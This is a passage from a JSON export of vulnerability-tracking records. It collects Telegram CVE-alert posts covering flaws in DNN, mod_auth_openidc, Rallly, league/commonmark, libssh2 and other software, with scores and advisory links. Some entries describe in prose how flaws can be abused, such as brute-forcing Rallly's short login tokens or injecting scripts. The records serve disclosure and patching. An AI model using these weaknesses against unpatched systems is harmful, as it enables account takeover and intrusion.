safety issues that can lead to memory corruption, disk image corruption, denial of service, and potential code execution. These issues stem from unchecked memory operations, unsafe typecasting, and improper input validation. This issue has been patched in version 0.0.3.\n\ud83d\udccf Published: 2025-06-24T03:06:12.471Z\n\ud83d\udccf Modified: 2025-06-24T03:06:12.471Z\n\ud83d\udd17 References:\n1. https://github.com/nekernel-org/nekernel/security/advisories/GHSA-cmp2-5f6g-mw34\n2. https://github.com/nekernel-org/nekernel/pull/35\n3. https://github.com/nekernel-org/nekernel/pull/36\n4. https://github.com/nekernel-org/nekernel/commit/6506875ad0ab210b82a5c4ce227bf851508de17d\n5. https://github.com/nekernel-org/nekernel/commit/6511afbf405c31513bc88ab06bca58218610a994", "creation_timestamp": "2025-06-24T03:48:14.000000Z"}, {"uuid": "c710789e-eebb-4e4f-aa25-172bd8ee7fc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WWC9-WMM3-2PMF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19105", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52485\n\ud83d\udd25 CVSS Score: 5.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted request to inject scripts in the Activity Feed Attachments endpoint which will then render in the feed. This issue has been patched in version 10.0.1.\n\ud83d\udccf Published: 2025-06-21T02:40:38.257Z\n\ud83d\udccf Modified: 2025-06-21T02:40:38.257Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-wwc9-wmm3-2pmf", "creation_timestamp": "2025-06-21T03:45:49.000000Z"}, {"uuid": "e354a991-f6d4-4a48-90db-02e01c1404de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RGX6-3W4J-GF5J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18755", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-4264\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: Potential buffer overflow vulnerabilities n the Zephyr Bluetooth subsystem.\n\ud83d\udccf Published: 2023-09-26T18:34:52.817Z\n\ud83d\udccf Modified: 2025-06-18T14:13:45.830Z\n\ud83d\udd17 References:\n1. https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-rgx6-3w4j-gf5j\n2. http://www.openwall.com/lists/oss-security/2023/11/07/1\n3. http://seclists.org/fulldisclosure/2023/Nov/1\n4. http://packetstormsecurity.com/files/175657/Zephyr-RTOS-3.x.0-Buffer-Overflows.html", "creation_timestamp": "2025-06-18T14:42:01.000000Z"}, {"uuid": "49bddfdc-8eff-42dc-a4e9-5e08f5cefbc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MP56-7VRW-QXVF", "type": "published-proof-of-concept", "source": "https://t.me/cKure/15266", "content": "\ud83e\udd16\ud83d\udd0dOpenAI Operator - Click on arbitrary origin by TOCTOU attack.\n\nhttps://github.com/google/security-research/security/advisories/GHSA-mp56-7vrw-qxvf", "creation_timestamp": "2025-08-18T21:12:49.000000Z"}, {"uuid": "07ed8a79-be09-4c47-a23d-4ead9e03178f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2204", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7676", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-5215\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in libnbd. A server can reply with a block size larger than 2^63 (the NBD spec states the size is a 64-bit unsigned value). This issue could lead to an application crash or other unintended behavior for NBD clients that doesn't treat the return value of the nbd_get_size() function correctly.\n\ud83d\udccf Published: 2023-09-28T13:55:32.462Z\n\ud83d\udccf Modified: 2025-03-15T08:03:39.915Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2204\n2. https://access.redhat.com/security/cve/CVE-2023-5215\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2241041\n4. https://listman.redhat.com/archives/libguestfs/2023-September/032635.html", "creation_timestamp": "2025-03-15T08:44:40.000000Z"}, {"uuid": "4ba0ee01-f791-41bb-b59d-53437afacbc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59JP-RWPH-878R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10642", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31492\n\ud83d\udd25 CVSS Score: 8.2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: mod_auth_openidc is an OpenID Certified authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. Prior to 2.4.16.11, a bug in a mod_auth_openidc results in disclosure of protected content to unauthenticated users. The conditions for disclosure are an OIDCProviderAuthRequestMethod POST, a valid account, and there mustn't be any application-level gateway (or load balancer etc) protecting the server. When you request a protected resource, the response includes the HTTP status, the HTTP headers, the intended response (the self-submitting form), and the protected resource (with no headers). This is an example of a request for a protected resource, including all the data returned. In the case where mod_auth_openidc returns a form, it has to return OK from check_userid so as not to go down the error path in httpd. This means httpd will try to issue the protected resource. oidc_content_handler is called early, which has the opportunity to prevent the normal output being issued by httpd. oidc_content_handler has a number of checks for when it intervenes, but it doesn't check for this case, so the handler returns DECLINED. Consequently, httpd appends the protected content to the response. The issue has been patched in mod_auth_openidc versions &gt;= 2.4.16.11.\n\ud83d\udccf Published: 2025-04-06T20:02:20.511Z\n\ud83d\udccf Modified: 2025-04-06T20:02:20.511Z\n\ud83d\udd17 References:\n1. https://github.com/OpenIDC/mod_auth_openidc/security/advisories/GHSA-59jp-rwph-878r\n2. https://github.com/OpenIDC/mod_auth_openidc/commit/b59b8ad63411857090ba1088e23fe414c690c127", "creation_timestamp": "2025-04-06T20:44:00.000000Z"}, {"uuid": "f9856a1b-9e4f-4ac4-a78f-06f89be3807d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1391", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11857", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2182\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Open Virtual Network (OVN). In OVN clusters where BFD is used between hypervisors for high availability, an attacker can inject specially crafted BFD packets from inside unprivileged workloads, including virtual machines or containers, that can trigger a denial of service.\n\ud83d\udccf Published: 2024-03-12T16:18:31.829Z\n\ud83d\udccf Modified: 2025-04-15T15:26:18.815Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1385\n2. https://access.redhat.com/errata/RHSA-2024:1386\n3. https://access.redhat.com/errata/RHSA-2024:1387\n4. https://access.redhat.com/errata/RHSA-2024:1388\n5. https://access.redhat.com/errata/RHSA-2024:1390\n6. https://access.redhat.com/errata/RHSA-2024:1391\n7. https://access.redhat.com/errata/RHSA-2024:1392\n8. https://access.redhat.com/errata/RHSA-2024:1393\n9. https://access.redhat.com/errata/RHSA-2024:1394\n10. https://access.redhat.com/errata/RHSA-2024:4035\n11. https://access.redhat.com/security/cve/CVE-2024-2182\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2267840\n13. https://mail.openvswitch.org/pipermail/ovs-announce/2024-March/000346.html\n14. https://www.openwall.com/lists/oss-security/2024/03/12/5", "creation_timestamp": "2025-04-15T15:54:53.000000Z"}, {"uuid": "889629bd-55fd-447e-86fe-fd3ee1879687", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MG66-QVC5-RM93", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12930", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29198\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.SparseTensorToCSRSparseMatrix` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `dense_shape` is a vector and `indices` is a matrix (as part of requirements for sparse tensors) but there is no validation for this. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T21:50:12.000Z\n\ud83d\udccf Modified: 2025-04-22T17:59:29.034Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n2. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n3. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\n5. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mg66-qvc5-rm93\n6. https://github.com/tensorflow/tensorflow/commit/ea50a40e84f6bff15a0912728e35b657548cef11\n7. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/sparse/sparse_tensor_to_csr_sparse_matrix_op.cc#L65-L119", "creation_timestamp": "2025-04-22T18:03:49.000000Z"}, {"uuid": "2a2f55ee-5253-487b-9c05-1ace905731bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4051", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13018", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12243\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A flaw was found in GnuTLS, which relies on libtasn1 for ASN.1 data processing. Due to an inefficient algorithm in libtasn1, decoding certain DER-encoded certificate data can take excessive time, leading to increased resource consumption. This flaw allows a remote attacker to send a specially crafted certificate, causing GnuTLS to become unresponsive or slow, resulting in a denial-of-service condition.\n\ud83d\udccf Published: 2025-02-10T15:28:10.328Z\n\ud83d\udccf Modified: 2025-04-23T10:53:56.693Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4051\n2. https://access.redhat.com/security/cve/CVE-2024-12243\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2344615\n4. https://gitlab.com/gnutls/libtasn1/-/issues/52", "creation_timestamp": "2025-04-23T11:20:41.000000Z"}, {"uuid": "98288446-6822-4dab-9c2b-d6cd5769ba7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1652", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13137", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3856\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 before 1.8.1 in the way keyboard prompt requests are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:31:03.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:00.365Z\n\ud83d\udd17 References:\n1. https://www.libssh2.org/CVE-2019-3856.html\n2. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3856\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:49.000000Z"}, {"uuid": "9278ddd2-51d4-4dfb-8f4c-333afe35b9c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2JH-RQFF-7VMG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14554", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46345\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Auth0 Account Link Extension is an extension aimed to help link accounts easily. Versions 2.3.4 to 2.6.6 do not verify the signature of the provided JWT. This allows the user the ability to supply a forged token and the potential to access user information without proper authorization. This issue has been patched in versions 2.6.7, 2.7.0, and 3.0.0. It is recommended to upgrade to version 3.0.0 or greater.\n\ud83d\udccf Published: 2025-05-01T17:20:24.010Z\n\ud83d\udccf Modified: 2025-05-02T17:39:32.800Z\n\ud83d\udd17 References:\n1. https://github.com/auth0-extensions/auth0-account-link-extension/security/advisories/GHSA-j2jh-rqff-7vmg\n2. https://github.com/auth0-extensions/auth0-account-link-extension/pull/187", "creation_timestamp": "2025-05-02T18:19:52.000000Z"}, {"uuid": "8e648d91-d1d2-4cad-ac82-cf327d6b598c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1566", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "509d8b23-8388-4923-bae0-2831381525f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3527-QV2Q-PFVX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14988", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46734\n\ud83d\udd25 CVSS Score: 6.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: league/commonmark is a PHP Markdown parser. A cross-site scripting (XSS) vulnerability in the Attributes extension of the league/commonmark library (versions 1.5.0 through 2.6.x) allows remote attackers to insert malicious JavaScript calls into HTML. The league/commonmark library provides configuration options such as `html_input: 'strip'` and `allow_unsafe_links: false` to mitigate cross-site scripting (XSS) attacks by stripping raw HTML and disallowing unsafe links. However, when the Attributes Extension is enabled, it introduces a way for users to inject arbitrary HTML attributes into elements via Markdown syntax using curly braces. Version 2.7.0 contains three changes to prevent this XSS attack vector: All attributes starting with `on` are considered unsafe and blocked by default; support for an explicit allowlist of allowed HTML attributes; and manually-added `href` and `src` attributes now respect the existing `allow_unsafe_links` configuration option. If upgrading is not feasible, please consider disabling the `AttributesExtension` for untrusted users and/or filtering the rendered HTML through a library like HTMLPurifier.\n\ud83d\udccf Published: 2025-05-05T19:52:59.521Z\n\ud83d\udccf Modified: 2025-05-05T19:52:59.521Z\n\ud83d\udd17 References:\n1. https://github.com/thephpleague/commonmark/security/advisories/GHSA-3527-qv2q-pfvx\n2. https://github.com/thephpleague/commonmark/commit/f0d626cf05ad3e99e6db26ebcb9091b6cd1cd89b", "creation_timestamp": "2025-05-05T20:20:16.000000Z"}, {"uuid": "d6dd115a-e3be-43e6-88d7-1b158953df5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GM8G-3R3J-48HV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16330", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47781\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Rallly is an open-source scheduling and collaboration tool. Versions up to and including 3.22.1 of the application features token based authentication. When a user attempts to login to the application, they insert their email and a 6 digit code is sent to their email address to complete the authentication. A token that consists of 6 digits only presents weak entropy however and when coupled with no token brute force protection, makes it possible for an unauthenticated attacker with knowledge of a valid email address to successfully brute force the token within 15 minutes (token expiration time) and take over the account associated with the targeted email address. All users on the Rallly applications are impacted. As long as an attacker knows the user's email address they used to register on the app, they can systematically take over any user account. For the authentication mechanism to be safe, the token would need to be assigned a complex high entropy value that cannot be bruteforced within reasonable time, and ideally rate limiting the /api/auth/callback/email endpoint to further make brute force attempts unreasonable within the 15 minutes time. As of time of publication, no patched versions are available.\n\ud83d\udccf Published: 2025-05-14T15:52:13.559Z\n\ud83d\udccf Modified: 2025-05-14T15:52:13.559Z\n\ud83d\udd17 References:\n1. https://github.com/lukevella/rallly/security/advisories/GHSA-gm8g-3r3j-48hv", "creation_timestamp": "2025-05-14T16:33:49.000000Z"}, {"uuid": "53bb5eb5-d40c-4d57-9f0d-2ca3d16a5440", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4HF-FXCG-CP34", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17409", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48378\n\ud83d\udd25 CVSS Score: 6.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to version 9.13.9, uploaded SVG files could contain scripts and if rendered inline those scripts could run allowing XSS attacks. Version 9.13.9 fixes the issue.\n\ud83d\udccf Published: 2025-05-23T15:39:03.727Z\n\ud83d\udccf Modified: 2025-05-23T15:39:03.727Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-m4hf-fxcg-cp34\n2. https://github.com/dnnsoftware/Dnn.Platform/commit/cfed83c291d5e5072b2fa70924a8b7c35b1cdf9e", "creation_timestamp": "2025-05-23T15:44:42.000000Z"}, {"uuid": "0588fdab-3236-4e03-9efc-4930f7bbffb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2974", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18479", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-43788\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A vulnerability was found in libXpm due to a boundary condition within the XpmCreateXpmImageFromBuffer() function. This flaw allows a local attacker to trigger an out-of-bounds read error and read the contents of memory on the system.\n\ud83d\udccf Published: 2023-10-10T12:26:08.737Z\n\ud83d\udccf Modified: 2025-06-16T17:04:22.032Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2146\n2. https://access.redhat.com/errata/RHSA-2024:2217\n3. https://access.redhat.com/errata/RHSA-2024:2974\n4. https://access.redhat.com/errata/RHSA-2024:3022\n5. https://access.redhat.com/security/cve/CVE-2023-43788\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2242248", "creation_timestamp": "2025-06-16T17:37:54.000000Z"}, {"uuid": "aca1209c-453e-4178-894b-cfa014300368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180606-ASAFTD", "type": "published-proof-of-concept", "source": "https://t.me/antichat/1695", "content": "#network #exploit #\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\n\n\u041f\u043e\u043a\u0430 \u0433\u0440\u043e\u043c \u043d\u0435 \u0433\u0440\u044f\u043d\u0435\u0442\n\n\u0415\u0441\u043b\u0438 \u0410\u0441\u0443 \u043d\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c, \u0442\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0441\u0445\u043b\u043e\u043f\u043e\u0442\u0430\u0442\u044c \u043c\u043e\u0436\u043d\u043e. \u0414\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2018-0296 \u0432 Cisco ASA \u0438 Firepower Threat Defense \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b, \u043c\u043e\u0436\u043d\u043e Path Traversal \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c, \u0430 \u043c\u043e\u0436\u043d\u043e - DoS. \u0412\u0441\u044f\u043a\u043e \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e.\n\n\u0410\u043f\u0434\u0435\u0439\u0442\u044b \u0442\u043e Cisco \u0435\u0449\u0435 \u0440\u0430\u043d\u044c\u0448\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd):\n\n\u0432\u0435\u0442\u043a\u0430 9.1 ASA - 9.1.7.29\n\u0432\u0435\u0442\u043a\u0430 9.2 ASA - 9.2.4.33\n\u0432\u0435\u0442\u043a\u0430 9.4 ASA - 9.4.4.18\n\u0432\u0435\u0442\u043a\u0430 9.6 ASA - 9.6.4.8\n\u0432\u0435\u0442\u043a\u0430 9.7 ASA - 9.7.1.24\n\u0432\u0435\u0442\u043a\u0430 9.8 ASA - 9.8.2.28\n\u0432\u0435\u0442\u043a\u0430 9.9 ASA - 9.9.2.1\n\u0432\u0435\u0442\u043a\u0438 9.3, 9.5 \u0438 \u0434\u043e 9.1 \u043d\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f\n\n\u0432\u0435\u0442\u043a\u0430 6.1.0 FTD - \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c Cisco_FTD_SSP_Hotfix_EI-6.1.0.7-2.sh (\u0434\u043b\u044f 41xx \u0438 9300) \u0438\u043b\u0438 Cisco_FTD_Hotfix_EI-6.1.0.7-2.sh (\u0434\u043b\u044f \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0445)\n\u0432\u0435\u0442\u043a\u0430 6.2.0 FTD - \u0432\u043e\u043e\u0431\u0449\u0435 \u043d\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\u0432\u0435\u0442\u043a\u0430 6.2.2 - 6.2.2.3\n\u0432\u0435\u0442\u043a\u0430 6.2.3 - 6.2.3.1, \u0438\u043b\u0438 6.2.3-85 (\u0434\u043b\u044f Microsoft Azure Cloud), \u0438\u043b\u0438 6.2.3-85.0 (\u0434\u043b\u044f AWS Cloud)\n\u0432\u0435\u0442\u043a\u0438 6.2.1 \u0438 \u0434\u043e 6.1 \u043d\u0435 